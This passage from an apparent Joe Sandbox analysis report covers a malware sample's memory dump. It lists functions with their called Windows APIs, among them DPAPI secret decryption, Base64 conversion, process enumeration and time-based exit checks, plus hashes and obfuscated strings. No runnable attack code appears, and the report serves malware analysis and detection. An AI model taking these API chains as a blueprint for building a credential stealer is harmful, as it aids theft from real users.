                                • Source File: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: #VS[$\xC?$]=c{$aiRk$Yvw
                                • API String ID: 0-1308879495
                                • Opcode ID: be39b3e1d9670d6d7e59bfd097597581cef396dd5e30438ad76758ea3691d9bf
                                • Instruction ID: 983da7624ce1dde4ca9e6633a1b6c4c0d4379dab700779da43e99050127d831f
                                • Opcode Fuzzy Hash: be39b3e1d9670d6d7e59bfd097597581cef396dd5e30438ad76758ea3691d9bf
                                • Instruction Fuzzy Hash: C0B229F3A0C2049FE7046E2DEC8567ABBE9EF94320F1A4A3DEAC4C3744E57558058697
                                Function 0090583B Relevance: 7.8, Strings: 5, Instructions: 1548COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: !%w$'%{w$2_{$2fW^$Vsop
                                • API String ID: 0-4043967527
                                • Opcode ID: 3b5978f23f3eda94e28c75229be3b7dbcb4a299258e5b5fbb559b4e557cd3450
                                • Instruction ID: 87aab4df447dfba09566b8035730a89c5076cbd72f4af95fb6d698a1f706e400
                                • Opcode Fuzzy Hash: 3b5978f23f3eda94e28c75229be3b7dbcb4a299258e5b5fbb559b4e557cd3450
                                • Instruction Fuzzy Hash: 5EB2C4F360C2049FE304AE29EC8567ABBE9EF94320F16893DEAC4C3744E63558558797
                                Function 0054C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0054C871
                                • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0054C87C
                                • lstrcat.KERNEL32(?,00560B46), ref: 0054C943
                                • lstrcat.KERNEL32(?,00560B47), ref: 0054C957
                                • lstrcat.KERNEL32(?,00560B4E), ref: 0054C978
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$BinaryCryptStringlstrlen
                                • String ID:
                                • API String ID: 189259977-0
                                • Opcode ID: b2e339575fdb71fbb3c74882a1d97ba26107b0d72a88e85e63eeb72559625798
                                • Instruction ID: 7694a0f8e25383b468692e2de00b57af6f670bcfd890dd94cc4aed83b0d2efee
                                • Opcode Fuzzy Hash: b2e339575fdb71fbb3c74882a1d97ba26107b0d72a88e85e63eeb72559625798
                                • Instruction Fuzzy Hash: 4441827590421AEFDB50CF90DC88BFEBBB8BB48304F1045A9E509A7280D7746A84CF95
                                Function 00556920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetSystemTime.KERNEL32(?), ref: 0055696C
                                • sscanf.NTDLL ref: 00556999
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 005569B2
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 005569C0
                                • ExitProcess.KERNEL32 ref: 005569DA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Time$System$File$ExitProcesssscanf
                                • String ID:
                                • API String ID: 2533653975-0
                                • Opcode ID: 631f077865c53c84a95d299afc5df222136f1d6655a8e7ac22cb7e8695584a02
                                • Instruction ID: 8caf9f43779a9a97a7eb2ede66784a3e42f99cde2df493f9a83766f1fc2f53a4
                                • Opcode Fuzzy Hash: 631f077865c53c84a95d299afc5df222136f1d6655a8e7ac22cb7e8695584a02
                                • Instruction Fuzzy Hash: 97210E75D00209ABDF04EFE4D9559EEBBB5FF48301F14852EE406E3250EB349608CB69
                                Function 00547240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0054724D
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00547254
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00547281
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 005472A4
                                • LocalFree.KERNEL32(?), ref: 005472AE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                • String ID:
                                • API String ID: 2609814428-0
                                • Opcode ID: 52a8c0d6dba93816a99f42a2a24f588c0201451f93bb37f7d13d6ff0fb4409a4
                                • Instruction ID: 922fda3bf3f069c4099ad58701a34be53594fcc213284005cfbff367ee785725
                                • Opcode Fuzzy Hash: 52a8c0d6dba93816a99f42a2a24f588c0201451f93bb37f7d13d6ff0fb4409a4
                                • Instruction Fuzzy Hash: 81011275A84208BBEB10DFD4CD49F9E77B8FB44704F208555FB05AB2C0D7B4AA008B69
                                Function 00559600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0055961E
                                • Process32First.KERNEL32(00560ACA,00000128), ref: 00559632
                                • Process32Next.KERNEL32(00560ACA,00000128), ref: 00559647
                                • StrCmpCA.SHLWAPI(?,00000000), ref: 0055965C
                                • CloseHandle.KERNEL32(00560ACA), ref: 0055967A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 420147892-0
                                • Opcode ID: 5542765b83d447fe76b6c1ac9a591a3884f50f913d55e1684c9121ea195d30da
                                • Instruction ID: 30f10f6d7647c54cd76cc577cf2f5a09c0627176ebb3f7460e8ff16ccef10938
                                • Opcode Fuzzy Hash: 5542765b83d447fe76b6c1ac9a591a3884f50f913d55e1684c9121ea195d30da
                                • Instruction Fuzzy Hash: 56011E75A40208FBDB15DFA5DD58BEDBBF8FB48301F10819AA90697240D738AB48DF51
                                Function 00903D5B Relevance: 6.6, Strings: 4, Instructions: 1575COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 3U_}$V*?$oB{$}%^
                                • API String ID: 0-490623412
                                • Opcode ID: 0d6171a3c87796cd7478ecfdc06d8ad42e4ba55f3b93b7fbd329315d0f4a3e7d
                                • Instruction ID: fd76a1f1c32676d11267c8e98c150c78c2b812264d980b3cf8ea27bb279437c7
                                • Opcode Fuzzy Hash: 0d6171a3c87796cd7478ecfdc06d8ad42e4ba55f3b93b7fbd329315d0f4a3e7d
                                • Instruction Fuzzy Hash: C9B227F3A082049FE304AE2DEC8567AFBE9EF94720F16893DE6C487744E63558058793
                                Function 00558EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                Download Yara Rule
                                APIs
                                • CryptBinaryToStringA.CRYPT32(00000000,00545184,40000001,00000000,00000000,?,00545184), ref: 00558EC0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptString
                                • String ID:
                                • API String ID: 80407269-0
                                • Opcode ID: d75f15da5fdf7a5c3e094528c9e45fef5f6188f8f2bc24e90b69ae6d59ec6a21
                                • Instruction ID: bd0c89bd58a0195c6973b113b63cb12f4f4e7e22e05ee27225a3465efb46f777
                                • Opcode Fuzzy Hash: d75f15da5fdf7a5c3e094528c9e45fef5f6188f8f2bc24e90b69ae6d59ec6a21
                                • Instruction Fuzzy Hash: 4B110670200209BFDB00CFA4DC99FBA3BA9BF89315F109849FD1A9B250DB35E845DB64
                                Function 00557A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0107F3C0,00000000,?,00560E10,00000000,?,00000000,00000000), ref: 00557A63
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00557A6A
                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0107F3C0,00000000,?,00560E10,00000000,?,00000000,00000000,?), ref: 00557A7D
                                • wsprintfA.USER32 ref: 00557AB7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                • String ID:
                                • API String ID: 3317088062-0
                                • Opcode ID: 2d3e5e8b4172441975bad85ba95de534a54b2a4c7a569446806640a355a4b17d
                                • Instruction ID: 745be23eac5a31053389751bde1a19abe734283e5445a4c9f54f1fc9edd83371
                                • Opcode Fuzzy Hash: 2d3e5e8b4172441975bad85ba95de534a54b2a4c7a569446806640a355a4b17d
                                • Instruction Fuzzy Hash: 4B11A1B1A45218EBEB20CF54DC59FAABB78FB04721F10479AEA0A932C0D7781E44CF51
                                Function 008FECB6 Relevance: 5.4, Strings: 3, Instructions: 1687COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: !3s$vD_k$XO
                                • API String ID: 0-2592050594
                                • Opcode ID: 246c83f07c41e1699e5f6e55329684e7491d6aaa0591340169978f6b44b08fb2
                                • Instruction ID: 5a5c2861eba1717cfeca6c4f7f1b48447cc9c1df29d7cabd890898d3472458b3
                                • Opcode Fuzzy Hash: 246c83f07c41e1699e5f6e55329684e7491d6aaa0591340169978f6b44b08fb2
                                • Instruction Fuzzy Hash: 4DB21BF3A0C2049FE304AE2DDC8567AB7EAEFD4720F16853DEAC4C7744E97598058692
                                Function 008FD123 Relevance: 5.4, Strings: 3, Instructions: 1611COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: F:._$`Sr$cyS6
                                • API String ID: 0-4277574919
                                • Opcode ID: 739fed6bed8dfb1a06efdd2af5d908aa25dc0c6c00028e4f46cb3ac0e6379f9e
                                • Instruction ID: 4180bb97b986025283a9855c765727ae350874795182780309acdc020c95a0fd
                                • Opcode Fuzzy Hash: 739fed6bed8dfb1a06efdd2af5d908aa25dc0c6c00028e4f46cb3ac0e6379f9e
                                • Instruction Fuzzy Hash: 97B205F3A0C2049FE304AE29EC8567ABBE5EF94720F1A493DE6C4C7744E63598018797
                                Function 00553720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                Download Yara Rule
                                APIs
                                • CoCreateInstance.COMBASE(0055E118,00000000,00000001,0055E108,00000000), ref: 00553758
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 005537B0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
